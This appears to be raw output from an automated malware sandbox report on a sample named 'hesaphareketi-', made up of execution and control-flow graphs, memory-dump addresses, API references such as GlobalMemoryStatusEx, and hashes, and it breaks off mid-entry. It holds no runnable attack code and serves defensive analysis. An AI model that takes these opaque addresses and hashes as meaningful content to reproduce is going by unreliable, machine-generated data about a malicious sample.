                                            execution_graph 40296 1700848 40297 170084e 40296->40297 40298 170091b 40297->40298 40300 1701342 40297->40300 40302 1701356 40300->40302 40301 1701448 40301->40297 40302->40301 40304 1707061 40302->40304 40305 170706b 40304->40305 40306 1707121 40305->40306 40309 65ad4ca 40305->40309 40319 65ad288 40305->40319 40306->40302 40311 65ad4d6 40309->40311 40313 65ad29d 40309->40313 40310 65ad4b2 40310->40306 40312 65ad699 40311->40312 40324 65ae050 40311->40324 40328 65ae060 40311->40328 40312->40306 40313->40310 40315 65ad4ca GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40313->40315 40316 65ad4d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40313->40316 40314 65ad61a 40314->40306 40315->40313 40316->40313 40320 65ad29d 40319->40320 40321 65ad4b2 40320->40321 40322 65ad4d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40320->40322 40323 65ad4ca GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40320->40323 40321->40306 40322->40320 40323->40320 40332 65ae098 40324->40332 40340 65ae088 40324->40340 40325 65ae06e 40325->40314 40329 65ae06e 40328->40329 40330 65ae098 2 API calls 40328->40330 40331 65ae088 2 API calls 40328->40331 40329->40314 40330->40329 40331->40329 40333 65ae0cd 40332->40333 40334 65ae0a5 40332->40334 40348 65ad254 40333->40348 40334->40325 40336 65ae0ee 40336->40325 40338 65ae1b6 GlobalMemoryStatusEx 40339 65ae1e6 40338->40339 40339->40325 40341 65ae0cd 40340->40341 40342 65ae0a5 40340->40342 40343 65ad254 GlobalMemoryStatusEx 40341->40343 40342->40325 40344 65ae0ea 40343->40344 40345 65ae0ee 40344->40345 40346 65ae1b6 GlobalMemoryStatusEx 40344->40346 40345->40325 40347 65ae1e6 40346->40347 40347->40325 40349 65ae170 GlobalMemoryStatusEx 40348->40349 40351 65ae0ea 40349->40351 40351->40336 40351->40338
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 20d7c465667fca4b327dc4d172c68bd61588cb8721ff622f622de3a8ad560d56
                                            • Instruction ID: 42f1da9a071cbbc5ad105a76c6af988a82566fff2efc0a295c7d974f027f2c97
                                            • Opcode Fuzzy Hash: 20d7c465667fca4b327dc4d172c68bd61588cb8721ff622f622de3a8ad560d56
                                            • Instruction Fuzzy Hash: 3D53E631D10B1ACACB51EF68C8805A9F7B1FF99300F15D79AE4587B121EB70AAD5CB81

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                             control_flow_graph 2053 1704a60-1704ac6 2055 1704b10-1704b12 2053->2055 2056 1704ac8-1704ad3 2053->2056 2057 1704b14-1704b2d 2055->2057 2056->2055 2058 1704ad5-1704ae1 2056->2058 2064 1704b79-1704b7b 2057->2064 2065 1704b2f-1704b3b 2057->2065 2059 1704ae3-1704aed 2058->2059 2060 1704b04-1704b0e 2058->2060 2062 1704af1-1704b00 2059->2062 2063 1704aef 2059->2063 2060->2057 2062->2062 2066 1704b02 2062->2066 2063->2062 2068 1704b7d-1704b95 2064->2068 2065->2064 2067 1704b3d-1704b49 2065->2067 2066->2060 2069 1704b4b-1704b55 2067->2069 2070 1704b6c-1704b77 2067->2070 2075 1704b97-1704ba2 2068->2075 2076 1704bdf-1704be1 2068->2076 2071 1704b57 2069->2071 2072 1704b59-1704b68 2069->2072 2070->2068 2071->2072 2072->2072 2074 1704b6a 2072->2074 2074->2070 2075->2076 2077 1704ba4-1704bb0 2075->2077 2078 1704be3-1704bfb 2076->2078 2079 1704bb2-1704bbc 2077->2079 2080 1704bd3-1704bdd 2077->2080 2085 1704c45-1704c47 2078->2085 2086 1704bfd-1704c08 2078->2086 2081 1704bc0-1704bcf 2079->2081 2082 1704bbe 2079->2082 2080->2078 2081->2081 2084 1704bd1 2081->2084 2082->2081 2084->2080 2087 1704c49-1704cbc 2085->2087 2086->2085 2088 1704c0a-1704c16 2086->2088 2097 1704cc2-1704cd0 2087->2097 2089 1704c18-1704c22 2088->2089 2090 1704c39-1704c43 2088->2090 2092 1704c24 2089->2092 2093 1704c26-1704c35 2089->2093 2090->2087 2092->2093 2093->2093 2094 1704c37 2093->2094 2094->2090 2098 1704cd2-1704cd8 2097->2098 2099 1704cd9-1704d39 2097->2099 2098->2099 2106 1704d49-1704d4d 2099->2106 2107 1704d3b-1704d3f 2099->2107 2109 1704d5d-1704d61 2106->2109 2110 1704d4f-1704d53 2106->2110 2107->2106 2108 1704d41 2107->2108 2108->2106 2111 1704d71-1704d75 2109->2111 2112 1704d63-1704d67 2109->2112 2110->2109 2113 1704d55 2110->2113 2115 1704d85-1704d89 2111->2115 2116 1704d77-1704d7b 2111->2116 2112->2111 2114 1704d69 2112->2114 2113->2109 2114->2111 2118 1704d99-1704d9d 2115->2118 2119 1704d8b-1704d8f 2115->2119 2116->2115 2117 1704d7d 2116->2117 2117->2115 2121 1704dad 2118->2121 2122 1704d9f-1704da3 2118->2122 2119->2118 2120 1704d91-1704d94 call 1700ab8 2119->2120 2120->2118 2125 1704dae 2121->2125 2122->2121 2124 1704da5-1704da8 call 1700ab8 2122->2124 2124->2121 2125->2125
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ],{h$],{h
                                            • API String ID: 0-1926652952
                                            • Opcode ID: 55a987bdc109bd0a0f9ecf13fb69ab394ad34172341e93d575f54280296126a0
                                            • Instruction ID: b677d096b8d61a7532d02a76f98f9f51a73eb98adc15ea057db206482f2959e5
                                            • Opcode Fuzzy Hash: 55a987bdc109bd0a0f9ecf13fb69ab394ad34172341e93d575f54280296126a0
                                            • Instruction Fuzzy Hash: C7B16FB0E00709CFDF11CFA9D98179EFBF2AF88314F148529D616A7294EB749881CB81

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                             control_flow_graph 2201 1703e48-1703eae 2203 1703eb0-1703ebb 2201->2203 2204 1703ef8-1703efa 2201->2204 2203->2204 2206 1703ebd-1703ec9 2203->2206 2205 1703efc-1703f54 2204->2205 2215 1703f56-1703f61 2205->2215 2216 1703f9e-1703fa0 2205->2216 2207 1703ecb-1703ed5 2206->2207 2208 1703eec-1703ef6 2206->2208 2210 1703ed7 2207->2210 2211 1703ed9-1703ee8 2207->2211 2208->2205 2210->2211 2211->2211 2212 1703eea 2211->2212 2212->2208 2215->2216 2217 1703f63-1703f6f 2215->2217 2218 1703fa2-1703fba 2216->2218 2219 1703f71-1703f7b 2217->2219 2220 1703f92-1703f9c 2217->2220 2224 1704004-1704006 2218->2224 2225 1703fbc-1703fc7 2218->2225 2222 1703f7d 2219->2222 2223 1703f7f-1703f8e 2219->2223 2220->2218 2222->2223 2223->2223 2226 1703f90 2223->2226 2228 1704008-1704056 2224->2228 2225->2224 2227 1703fc9-1703fd5 2225->2227 2226->2220 2229 1703fd7-1703fe1 2227->2229 2230 1703ff8-1704002 2227->2230 2236 170405c-170406a 2228->2236 2231 1703fe3 2229->2231 2232 1703fe5-1703ff4 2229->2232 2230->2228 2231->2232 2232->2232 2234 1703ff6 2232->2234 2234->2230 2237 1704073-17040d3 2236->2237 2238 170406c-1704072 2236->2238 2245 17040e3-17040e7 2237->2245 2246 17040d5-17040d9 2237->2246 2238->2237 2248 17040f7-17040fb 2245->2248 2249 17040e9-17040ed 2245->2249 2246->2245 2247 17040db 2246->2247 2247->2245 2251 170410b 2248->2251 2252 17040fd-1704101 2248->2252 2249->2248 2250 17040ef-17040f2 call 1700ab8 2249->2250 2250->2248 2255 170410f 2251->2255 2252->2251 2254 1704103-1704106 call 1700ab8 2252->2254 2254->2251 2256 1704111-1704115 2255->2256 2257 170411f-1704123 2255->2257 2256->2257 2259 1704117-170411a call 1700ab8 2256->2259 2260 1704133-1704137 2257->2260 2261 1704125-1704129 2257->2261 2259->2257 2262 1704147-1704188 2260->2262 2263 1704139-170413d 2260->2263 2261->2260 2265 170412b 2261->2265 2262->2255 2268 170418a-17041f6 2262->2268 2263->2262 2266 170413f 2263->2266 2265->2260 2266->2262 2271 1704240-1704242 2268->2271 2272 17041f8-1704203 2268->2272 2274 1704244-170425d 2271->2274 2272->2271 2273 1704205-1704211 2272->2273 2275 1704213-170421d 2273->2275 2276 1704234-170423e 2273->2276 2281 17042a9-17042ab 2274->2281 2282 170425f-170426b 2274->2282 2277 1704221-1704230 2275->2277 2278 170421f 2275->2278 2276->2274 2277->2277 2280 1704232 2277->2280 2278->2277 2280->2276 2283 17042ad-1704305 2281->2283 2282->2281 2284 170426d-1704279 2282->2284 2293 1704307-1704312 2283->2293 2294 170434f-1704351 2283->2294 2285 170427b-1704285 2284->2285 2286 170429c-17042a7 2284->2286 2288 1704287 2285->2288 2289 1704289-1704298 2285->2289 2286->2283 2288->2289 2289->2289 2290 170429a 2289->2290 2290->2286 2293->2294 2296 1704314-1704320 2293->2296 2295 1704353-170436b 2294->2295 2302 17043b5-17043b7 2295->2302 2303 170436d-1704378 2295->2303 2297 1704322-170432c 2296->2297 2298 1704343-170434d 2296->2298 2300 1704330-170433f 2297->2300 2301 170432e 2297->2301 2298->2295 2300->2300 2304 1704341 2300->2304 2301->2300 2306 17043b9-170441e 2302->2306 2303->2302 2305 170437a-1704386 2303->2305 2304->2298 2307 1704388-1704392 2305->2307 2308 17043a9-17043b3 2305->2308 2315 1704420-1704426 2306->2315 2316 1704427-1704487 2306->2316 2309 1704394 2307->2309 2310 1704396-17043a5 2307->2310 2308->2306 2309->2310 2310->2310 2312 17043a7 2310->2312 2312->2308 2315->2316 2323 1704497-170449b 2316->2323 2324 1704489-170448d 2316->2324 2326 17044ab-17044af 2323->2326 2327 170449d-17044a1 2323->2327 2324->2323 2325 170448f 2324->2325 2325->2323 2329 17044b1-17044b5 2326->2329 2330 17044bf-17044c3 2326->2330 2327->2326 2328 17044a3 2327->2328 2328->2326 2329->2330 2331 17044b7-17044ba call 1700ab8 2329->2331 2332 17044d3-17044d7 2330->2332 2333 17044c5-17044c9 2330->2333 2331->2330 2334 17044e7-17044eb 2332->2334 2335 17044d9-17044dd 2332->2335 2333->2332 2337 17044cb-17044ce call 1700ab8 2333->2337 2339 17044fb-17044ff 2334->2339 2340 17044ed-17044f1 2334->2340 2335->2334 2338 17044df-17044e2 call 1700ab8 2335->2338 2337->2332 2338->2334 2344 1704501-1704505 2339->2344 2345 170450f 2339->2345 2340->2339 2343 17044f3 2340->2343 2343->2339 2344->2345 2346 1704507 2344->2346 2347 1704510 2345->2347 2346->2345 2347->2347
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ],{h$],{h
                                            • API String ID: 0-1926652952
                                            • Opcode ID: 8faa6928e4d6ededab1bf88157d34824ac697d47020cbb0dbfd0c2cdf206cb54
                                            • Instruction ID: b3c36c7ea4cabe1f883597267618d7376235fb8e77b90c9bbd32acc1738955cc
                                            • Opcode Fuzzy Hash: 8faa6928e4d6ededab1bf88157d34824ac697d47020cbb0dbfd0c2cdf206cb54
                                            • Instruction Fuzzy Hash: D49139B0E00309DFDB11CFA9C98579DFBF2BF88314F148129E519A7294EB749886CB91
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 02f4619dd033645c9622f3ee3173f9b04fc04fe4f1c4d06dc809193fc0f87558
                                            • Instruction ID: 71615d3e1a46a903428c0f48eb17af84d9d51f2ed3ae732211d3db9cf4810bde
                                            • Opcode Fuzzy Hash: 02f4619dd033645c9622f3ee3173f9b04fc04fe4f1c4d06dc809193fc0f87558
                                            • Instruction Fuzzy Hash: 6E331C31D10719CEDB11EF68C8846ADF7B1FF99300F15C69AE448A7261EB70AAD5CB81
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2b1c667bf09cf026aae7a9c42022d2003408d4774d54d266acfeb76f24278b6b
                                            • Instruction ID: f8437a368d9f6d1a13f6cceae87837376763d21e42a6edb0355b66a8b2bc3b91
                                            • Opcode Fuzzy Hash: 2b1c667bf09cf026aae7a9c42022d2003408d4774d54d266acfeb76f24278b6b
                                            • Instruction Fuzzy Hash: 8A327D75A00205CFDB15CFA8D984BADBBF2EB88314F148469E609EB396DB34DC41CB90

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4501591917.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_65a0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ],{h
                                            • API String ID: 0-2799107760
                                            • Opcode ID: 9e64bbb9a08491fd4a3fa764b055e9d448d1875f63b22eab364faa18e76386bc
                                            • Instruction ID: 27faa35b80cb025f1eea1314ae4529f3c744699dc03d1b66a61368a7045a5385
                                            • Opcode Fuzzy Hash: 9e64bbb9a08491fd4a3fa764b055e9d448d1875f63b22eab364faa18e76386bc
                                            • Instruction Fuzzy Hash: 8E410271E043598FCB04DFB9D8056EEBBF5BF89210F14866AE418A7241DB389841CBE0

                                            Control-flow Graph

                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,065AE0EA), ref: 065AE1D7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4501591917.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_65a0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID: ],{h
                                            • API String ID: 1890195054-2799107760
                                            • Opcode ID: 8be18f42d441d5f9c0863379fdd47fe23ed69d9b8d164614fc90022e395db1d7
                                            • Instruction ID: b585847bf665f124be2becba94d16f1661d7626072c028ee694f536f62b7594e
                                            • Opcode Fuzzy Hash: 8be18f42d441d5f9c0863379fdd47fe23ed69d9b8d164614fc90022e395db1d7
                                            • Instruction Fuzzy Hash: B51103B1C006699FCB10DF9AD545BEEFBF5BF48320F14816AE418A7240D778A940CFA5

                                            Control-flow Graph

                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,065AE0EA), ref: 065AE1D7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4501591917.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_65a0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID: ],{h
                                            • API String ID: 1890195054-2799107760
                                            • Opcode ID: c81dd4e99829266bee037866b482c15b9bb727e776596899a0384dc7df99003a
                                            • Instruction ID: aca1c442e269f87d9186de074c607277b4d03624cbd9af929f1fabf123137391
                                            • Opcode Fuzzy Hash: c81dd4e99829266bee037866b482c15b9bb727e776596899a0384dc7df99003a
                                            • Instruction Fuzzy Hash: 291103B1C006699BCB10DF9AC545BAEFBF4FF48310F10856AE818A7240D378A944CFE5

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ],{h$],{h
                                            • API String ID: 0-1926652952
                                            • Opcode ID: 559d67749dfcc217e99921a6bfdca27976f14d021cbba99403bb9f294253f860
                                            • Instruction ID: 6933edebee734957ea2a3d870e2bcf4fb47adbc924a35df54cdccdd3eccaf0af
                                            • Opcode Fuzzy Hash: 559d67749dfcc217e99921a6bfdca27976f14d021cbba99403bb9f294253f860
                                            • Instruction Fuzzy Hash: 03A16EB0E00709CFDF11CFA9D98179EFBF2AF88314F148529D616A7294EB749881CB91

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ],{h$],{h
                                            • API String ID: 0-1926652952
                                            • Opcode ID: 4a83d5aab778ae24f3dd86e0e574b209975a0df6386f4f69e564dbd669721e79
                                            • Instruction ID: 83990a61e0c6f88780f645ea1324e9e7e03a3df193bc7c9485df946bd427b19a
                                            • Opcode Fuzzy Hash: 4a83d5aab778ae24f3dd86e0e574b209975a0df6386f4f69e564dbd669721e79
                                            • Instruction Fuzzy Hash: 86913CB0E00309DFDB11CFA9C98579DFBF2BF88314F148129E519A7294DB749886CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ],{h$],{h
                                            • API String ID: 0-1926652952
                                            • Opcode ID: e8653acf15fd0b486e836fdaaf90446e0ac95f52526936f4a153a7b0c68dc670
                                            • Instruction ID: 0ce32d7a66dfc29a5fe64ce61d60c7e47a85df388dd37866a1451a29e706facb
                                            • Opcode Fuzzy Hash: e8653acf15fd0b486e836fdaaf90446e0ac95f52526936f4a153a7b0c68dc670
                                            • Instruction Fuzzy Hash: 3F718BB0E10349CFDF11CFA9C8457AEFBF2AF88314F148129E516A7294DB749981CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ],{h$],{h
                                            • API String ID: 0-1926652952
                                            • Opcode ID: 21770bfcb83fe67ae74028114012422f0e5b55db4a9829ed92a96cbd78e1b704
                                            • Instruction ID: 2888e10beec95998bd7af80e8f52747aebcba2d4694b202425a339a0784da820
                                            • Opcode Fuzzy Hash: 21770bfcb83fe67ae74028114012422f0e5b55db4a9829ed92a96cbd78e1b704
                                            • Instruction Fuzzy Hash: 9D7169B0E10349DFDF11CFA9C88579EFBF2AF88314F148129E51AA7294DB749981CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$LR]q
                                            • API String ID: 0-3917262905
                                            • Opcode ID: 3ab59dffaf1511489813a34133794ee5c5c43bb7473a6aa92f247c669bfefda2
                                            • Instruction ID: 051a736cff947d0d78f0aeba7384659eef7e964eb66ac3cddc6428c0d87fcacf
                                            • Opcode Fuzzy Hash: 3ab59dffaf1511489813a34133794ee5c5c43bb7473a6aa92f247c669bfefda2
                                            • Instruction Fuzzy Hash: 77519E30A103199FDB16DF69C8547AEBBF2EF85300F10856AE405EB381EB75AC46CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ],{h$],{h
                                            • API String ID: 0-1926652952
                                            • Opcode ID: 13249bc5af843da33e23e36eb1b37256434d1e88fc56153b266865f8c11496ad
                                            • Instruction ID: c14321e383bbf28472d6d45c20ec7b8fb29b715a2d52a8e60d990981a9abb637
                                            • Opcode Fuzzy Hash: 13249bc5af843da33e23e36eb1b37256434d1e88fc56153b266865f8c11496ad
                                            • Instruction Fuzzy Hash: 83510070D00318CFDB19CFA9C899B9DFBF1BF48714F148129E819AB295D774A884CB95
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ],{h$],{h
                                            • API String ID: 0-1926652952
                                            • Opcode ID: 95991342794f460d2e0a81320bc5f36209ae38c9a42de88f73c6ab8bb7f1413c
                                            • Instruction ID: fad312aa98dc7ada31bd50bf86274a618cf11c694349644247d9e8d5cf668434
                                            • Opcode Fuzzy Hash: 95991342794f460d2e0a81320bc5f36209ae38c9a42de88f73c6ab8bb7f1413c
                                            • Instruction Fuzzy Hash: 4A51EF70D00318CFDB19CFA9C895B9DFBF1BF48714F148129E819AB295DB74A884CB95
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH]q
                                            • API String ID: 0-3168235125
                                            • Opcode ID: eb154726d06bf1c1b0ba50c12cdf56e801d321eb65d2b7bf5f67a8dbae7318c4
                                            • Instruction ID: c4d574840e0cf48030e61493fa38b295a7b543e8171690490bf20b05bab95504
                                            • Opcode Fuzzy Hash: eb154726d06bf1c1b0ba50c12cdf56e801d321eb65d2b7bf5f67a8dbae7318c4
                                            • Instruction Fuzzy Hash: 4131BF30700201DFDB2A9F34D55466EBBE6AB89600F24447DD406EB3D5DE7ADC46CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH]q
                                            • API String ID: 0-3168235125
                                            • Opcode ID: ddffed0eae1f593a9b363504f058b7ef875d7a35b0811ec9c5752e1a2cab9328
                                            • Instruction ID: 97386a6f23f5525629c6bd6be7f7b66875d417dce2d1a6ac86e60c3217af7622
                                            • Opcode Fuzzy Hash: ddffed0eae1f593a9b363504f058b7ef875d7a35b0811ec9c5752e1a2cab9328
                                            • Instruction Fuzzy Hash: 1531CD30B002018FDB2A9F38D55066EBBE6AF88200F20443CD406DB3D9DE3ADC46CB95
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q
                                            • API String ID: 0-3081347316
                                            • Opcode ID: 7da63231d518fb03f2c660c2cac1323229e2457a45661182f6dc003577f2e892
                                            • Instruction ID: 92f7dfdfd10f8bd72abc019945a567fe21a92a5c30ac639760b23b00bb3891cd
                                            • Opcode Fuzzy Hash: 7da63231d518fb03f2c660c2cac1323229e2457a45661182f6dc003577f2e892
                                            • Instruction Fuzzy Hash: 22316E70E10309DFDB26CFA9C4507AEF7B1EF85314F608529E506EB281E775A852CB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ],{h
                                            • API String ID: 0-2799107760
                                            • Opcode ID: 6c1e254af4a0c5c42d7226058626cc49a2bf4f5ff88fe60596bf98f5ecd95f92
                                            • Instruction ID: 5a4b41a5f2b6219499b86161e59432a4afa2712262bee534b12b435445b10854
                                            • Opcode Fuzzy Hash: 6c1e254af4a0c5c42d7226058626cc49a2bf4f5ff88fe60596bf98f5ecd95f92
                                            • Instruction Fuzzy Hash: F341FEB1D00349DFDB14DFA9C584ADEBFF5BF48314F24802AE909AB250DB75A985CB90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ],{h
                                            • API String ID: 0-2799107760
                                            • Opcode ID: ee603e7d5d1319a32b2b354619b7b9eefd5950156eb8ad71564c26f0f5247115
                                            • Instruction ID: c0f412a6c6cc9113f85d8e642c6075178f13a7e0fdcda6286e10109853e58011
                                            • Opcode Fuzzy Hash: ee603e7d5d1319a32b2b354619b7b9eefd5950156eb8ad71564c26f0f5247115
                                            • Instruction Fuzzy Hash: CF41EDB1D00349DFDB14DFA9C584ADEBFF5BF48310F20802AE919AB254DB75A985CB90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q
                                            • API String ID: 0-3081347316
                                            • Opcode ID: 281e03cd7472a109f1f43b5eb806f8d520f3a376448ac5a54fa0869de8ef3dc7
                                            • Instruction ID: 4580948bb115f3c9da5837511dfb2500276ff24497747de234d0cea0ddb42cf5
                                            • Opcode Fuzzy Hash: 281e03cd7472a109f1f43b5eb806f8d520f3a376448ac5a54fa0869de8ef3dc7
                                            • Instruction Fuzzy Hash: BF11A3316092859FC3175B79846466EBFB2AF86700B1585EAD049CB3A2DA358C4AC792
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d930de9cf3db0d935e587e8f0c2d522bc4edc9cbe02c751a7b060440b7abbd84
                                            • Instruction ID: 142ae50c31e0e7a5ed67cf4d6e266324dac8ec57f7a044c46c7d3e9ef71b209a
                                            • Opcode Fuzzy Hash: d930de9cf3db0d935e587e8f0c2d522bc4edc9cbe02c751a7b060440b7abbd84
                                            • Instruction Fuzzy Hash: 9F521534A00304CFDB26CB68C584A9DBBF2FB49314F558469E459EB2A2DB35EC86CB51
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 88c51908e064debe99158b8303da3ab5375dc5bdfba4bd0c47bf240e524d0140
                                            • Instruction ID: 913e5251073f88951d369d35265cff8c5341b739155ca167e631f1a1a401c03d
                                            • Opcode Fuzzy Hash: 88c51908e064debe99158b8303da3ab5375dc5bdfba4bd0c47bf240e524d0140
                                            • Instruction Fuzzy Hash: 03124F74712602CFCB1AAF2DE49861977AAFB85201F50893ED006DB7A5CF39EC46C781
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d5da63f6ab878890f6edcac8521fb9b5a6bb5ae8f2120fb668c5c4d3b8e36905
                                            • Instruction ID: 676d3879ab73d49f01dece434d2cb0bdf74b6b2ed6ffb388c577a1f667d48132
